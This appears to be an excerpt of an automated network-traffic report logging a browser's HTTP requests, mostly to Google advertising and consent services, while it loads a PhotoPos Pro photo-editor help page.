                  Source: global trafficHTTP traffic detected: GET /i/ca-pub-1428940366894897?href=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/drt/ui HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/drt/si?st=NO_DATA HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
                  Source: global trafficHTTP traffic detected: GET /f/AGSKWxXkoymV8XcPPSxVeoML9eviqjnANTFe9cO0MZwZ74oM0HoqqWVSdDLArXXtWIeu7xrufh8cXovxpISJhJTyX_9D7iup9O0eqr-wwA545JbMF4GLMVQ-Ulk4CX5PsfQGTNZYOOP4cw==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzQwMzI2MzI4LDYyMzAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly93d3cucGhvdG9wb3MuY29tL1Bob3RvUG9zUHJvX0ZyZWVQaG90b0VkaXRvcl92My9IZWxwJTIwUGFnZXMvUFBQM19IZWxwX1dlbGNvbWUuYXNweCIsbnVsbCxbWzgsInNmdFdZX2U0ZHBvIl0sWzksImVuLVVTIl0sWzIzLCIxNzQwMzI2MzI2Il0sWzE5LCIyIl0sWzE3LCJbMF0iXSxbMjQsIiJdXV0 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /xbbe/pixel?d=CNGF4AEQ0IrpARjSpemjAjAB&v=APEucNVMOefJxUXpf7qdRIUlAkrrKMtlGExdWSPDS9UVmXTP_K-xWhvdtgpODDOwZV6fvg0vtZSGV-b9fETU21eQafbKS_RgNA HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/html/r20250218/r20190131/zrt_lookup_fy2021.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
                  Source: global trafficHTTP traffic detected: GET /simgad/10231397504279189861 HTTP/1.1Host: s0.2mdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /dbm/ad?dbm_c=AKAmf-DVrlKcXfjX2LeAwOqJypa_R1YX44V47To3GsCcg-p3UWN7GcpruYODqbqic92r5bQhxfK-Br-9HiiddiFhyGF4PSZE8k5cij3_yNNDLZkdKiknLgQ1UMMGYAcxq_TQKJopTFUY9uGLryKRjSWy7UspZZdNrIPCpBvn_gUPxLKIj6PuwFqH6GDC-OGrY_S6LIP_YJUesZIIO7omiGMT2ljgYzbpzw&dbm_d=AKAmf-DPJ0YYkgJXJM58vcqzNKKefYlcab7Feg9GbH2TsUKJm12KzkuCvkkLxLUpQKdV2SksUViiX7WypCDgnKqHZ7EKegVK1CYGLQBYmBLluwePIbciHp7C2n4YmoQXJqfhmTIMOg7PfvY-gPHw6JxlnKV661I_VMtv6lChvqll1nIvGrE2fLlq-VzRfyBYzgaEdRgWdYsQxF2RyP1rcHvlb2NNihKTHE5X5uBdwD-8h20xKs97qv1LqEllfyCd4CyH1Fj_u5jRgVk-5lvLRe7Eyc2UnxyHDgTJKI0BQfwD-Dk8N0l71mnDSttfzatOAWD9obqaZ8gAshW7oOJcHF_mlK8u5kzcWzI8o26buAeNw8z1vU88Xk8hbMQkmhZB4lIjhx_Dzi9sEr9dZY2Djck1nzt3aHVPJEAANtfek_I8Xb-HYRUKReNEhGrfNKBJtxRf7Lo3WwuhYjutQihIKX12tE10ivtec85zdKCcjMsAuvwyjio08lJKgAmHAiS_y1p4nt7y_fWfabMAlZFemjF2mzaGwADiCwu3DPMFiNVDLQ4uEkODgp12sAJDUhyDqcicTYyhQK8LUmEG5NYWNgSdPAp840HnU_5sdCIlgB16MgRlSxappfl56TASqXTChFHWRBYRpaV_U_37FQA9ZmURbNzDvO_MUXzg2tSROUBNwmuFn9jCw3Yl2YE594LhSaUhFjYml7ITzvFFqZvRvUmwwZXPNARUjv3vib8_AvdYDqDtrq9o8BVWUfss3zc4X1WK6gS7TN891GvL5zkhjGXwVqN9uY08JYvNKeT58SgT8-OwpHLogX1G0HkXMxWhSbQGTy9e3rn5SlqIUInSaWUk4dU5X8Z1P-ZujIppxlrbwpjdCWkMP89pQ2W374-Q_0-E5KexphE4h0nY9tstoIxfu0JjB0wc7wPQU1t0-ZqmiMSKQNxuguv9NV1i-DmllnPmBEhig2K-w2qgqY4iHDKHdm9j1g8xaq9XO53XeErJ1GjBRb2haBKf9SK-s9bG8mQJpal9vdVd0wQNpQLcmkIai1atXGUqZzA1aCnJxYxFijvWT9dEt79oOMoLCm5Q0FvHtkwrZwRvZVNx6jEe55LQaFcR6rglLjIX7c6xcLosDwbl7n92zIOqeLG0LpBNVKuG6tqWqCnULoTyfr5yRAq8h3TYT1yZsAOzngQpre7j5tX7FEixneTro95I9RP7YfxIPpY4PwE-GTl8_AJlSad04vyj_2lQnYJER8lowM_ikGdWF5-19T5KQWYEgi4t363_c5qhBtBD3yFY0Bcsorsk2zKqUosYpmJimt4aHOn6ajmvI3Faf5OzjwoLEUh-mOcF0iZz6Kn1biLdgj5msKv_i7EdKYXo000DARZRTXJ8XSrWeKtDxmL_57IY9z4kMIrNIffDLtH7O6Fg12jaF5zKU1k4QsQxQq0xqJmX9O2_jjKh9i0ABZdurlGQZ09PDO1jDbTJqlWrmkwaISlYVgZOYoQSi4dTwdvoe9MrHehJHvJuERnzDEnwaeEjBrALYMhRFoCUV9ldwjX-OTbjc4ihzwnhzfZicMLR-stEj6ZHxYIAE1M9gY3A1LZlc70TJ67CP-rDc4g5Ixee2N7HCBGlXts1tzD7OKOYiGniEohM1KWwByIXKgLWZCeM3LeXpZcc4Q1b54rauhpTEd4OeOVP_Rx0ak6dUrDM0JHsrGpuKrtWZKyVDyFqOqMlxRacZwPJEcGB3aovLtevJh34Rtyb4XjyqcwfxrUadoR6rJNuBD10JEIiOksobsOu8cELf2l5eB2kkeLyaV2ToOwmPe4357-uRlJ1XdPe8pBKABs_WXEmxqli-vWSI9YenapbHCnpm9diObltCFM-9CCrOR1VthEWditwB7p5uIQxBbs4-MvpDQyiUdb9XPx6Um6yDbVscPc4bCoBQ_Ik6EjqDP0frISNBQDeRZ4WEZES3Lls9-Bh9f8bGgT3dU6XVkFtTWbHhlTm-1DE1W9q3greEHi0xz_ieoXnB-SjgRWtrRPFv64PnL7qipLR5CxGnQREl4UEQET0ewnK_si81qMgalCsSyRGQhPH-ULaqR9-6wTe-pN6QvczhZUg2Ajbtl6E95Z28SsQ-5QGJtcGGckCxfTQfvR190x77aAo8rD5DKaof0WUQjhdNaits2nCYGDbH5WTnA77oUBM0O9b75Ylrf1fr1LU3e1nZcP_O_-1KGkpWi_jGOkLEIgxFjeXc4V00PvXEBGNay7yNqfPKwwk4dhuplPZXkrV1G19dR4qYaXOJwlzF2oxQc66FJtFvronNg90Jm9OfMjanOM18bLUb0eZxXPu93h88CwulkwQ17qOq9R8mgCdknrX-pJlHyZn-U1FVUT_RUcphugbNToUQ8avL1HHalUXTq2383hmpF0MNVbH8PiX6vgXyPHmtu35dQdS1ZOwFM6mJm9_goA08b3GsG5RStga6sR5ksZskUJOfSdanWkuBGjNC4SSUo4McThtfM93p3Byd6DUWxuE0p7pNza6JpW2PoojrdP31661AvJdBQwkW4XKgxF4Jz_1GvhEZwh14KhrdA9_X-rzUCQOUx1d9RqlDXZt_KPNfDVo7DdD0vV4LRl19mKLNXfVo49b-xlauauLgzwWIDwGz0uhKW1PgIEfkpe0oC1LVFAfFJPcg9GrYmYfNyDx6KOC5NUVqpisgoqAwRNjNnecO8evg8j8F-1WxsrvmzYpGzlXXgotz2Y7Az0H7Kg6B
                  Source: global trafficHTTP traffic detected: GET /f/AGSKWxVYAUxXXkwBoZVMDFrw_3Q2RWAwXScGj9_F_8BgNQvlxLo8gPMpx-v3EIJ4RCxaBKUsogsPI1huYxqV6yovYUBDmGaec5WG9ZWp5qDZcGV9-j-UyNic3jQ1HXFq2iDNq8gPlci7KQ==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzQwMzI2MzI5LDg2MjAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsOV0sbnVsbCwyLG51bGwsImVuIl0sImh0dHBzOi8vd3d3LnBob3RvcG9zLmNvbS9QaG90b1Bvc1Byb19GcmVlUGhvdG9FZGl0b3JfdjMvSGVscCUyMFBhZ2VzL1BQUDNfSGVscF9XZWxjb21lLmFzcHgiLG51bGwsW1s4LCJzZnRXWV9lNGRwbyJdLFs5LCJlbi1VUyJdLFsyMywiMTc0MDMyNjMyNiJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzI0LCIiXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspx HTTP/1.1Host: www.photopos.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324; __gads=ID=4688b6cfea46fcf5:T=1740326326:RT=1740326326:S=ALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A; __gpi=UID=000010400d671c69:T=1740326326:RT=1740326326:S=ALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw; __eoi=ID=a73a950e8b687589:T=1740326326:RT=1740326326:S=AA-AfjYWjoKZSzCfr3rfuQpOlQZP; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326328.0.0.0
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326324&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324486&bpp=18&bdt=2762&idt=261&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=2430217688776&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=1024&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=269 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326324&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324486&bpp=18&bdt=2762&idt=261&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=2430217688776&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=1024&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=269Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/html/r20250218/r20190131/zrt_lookup_fy2021.html HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/html/r20250218/r20190131/zrt_lookup_fy2021.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: DSID=NO_DATA; IDE=AHWqTUlYKLd2nrLBhUcvh-IUqKEHhw_GypatkCoVS-brI49n0BtVL153Rojk2aZ8If-None-Match: 16100535776971501585
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=164&slotname=1037575739&adk=145184860&adf=840300260&pi=t.ma~as.1037575739&w=654&abgtt=8&fwrn=4&lmt=1740326324&rafmt=11&format=654x164&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324650&bpp=1&bdt=2926&idt=147&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0%2C728x90&nras=1&correlator=2430217688776&frm=20&pv=1&rplot=4&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=351&ady=2655&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=1152&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&btvi=1&fsb=1&dtd=151 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1428940366894897&output=html&h=164&slotname=1037575739&adk=145184860&adf=840300260&pi=t.ma~as.1037575739&w=654&abgtt=8&fwrn=4&lmt=1740326324&rafmt=11&format=654x164&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324650&bpp=1&bdt=2926&idt=147&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0%2C728x90&nras=1&correlator=2430217688776&frm=20&pv=1&rplot=4&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=351&ady=2655&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=1152&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&bt
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&adk=1812271804&adf=3025194257&abgtt=9&lmt=1740326324&plaf=1%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1048576%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&pra=5&wgl=1&aihb=0&asro=0&ailel=1~2~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~3~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aiapm=0.15&aiapmi=0.33938&aiescf=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326323205&bpp=11&bdt=1481&idt=1501&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&nras=1&correlator=2430217688776&frm=20&pv=2&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fsapi=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=33792&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=1531 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1428940366894897&output=html&adk=1812271804&adf=3025194257&abgtt=9&lmt=1740326324&plaf=1%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1048576%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&pra=5&wgl=1&aihb=0&asro=0&ailel=1~2~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~3~4~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aiapm=0.15&aiapmi=0.33938&aiescf=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xl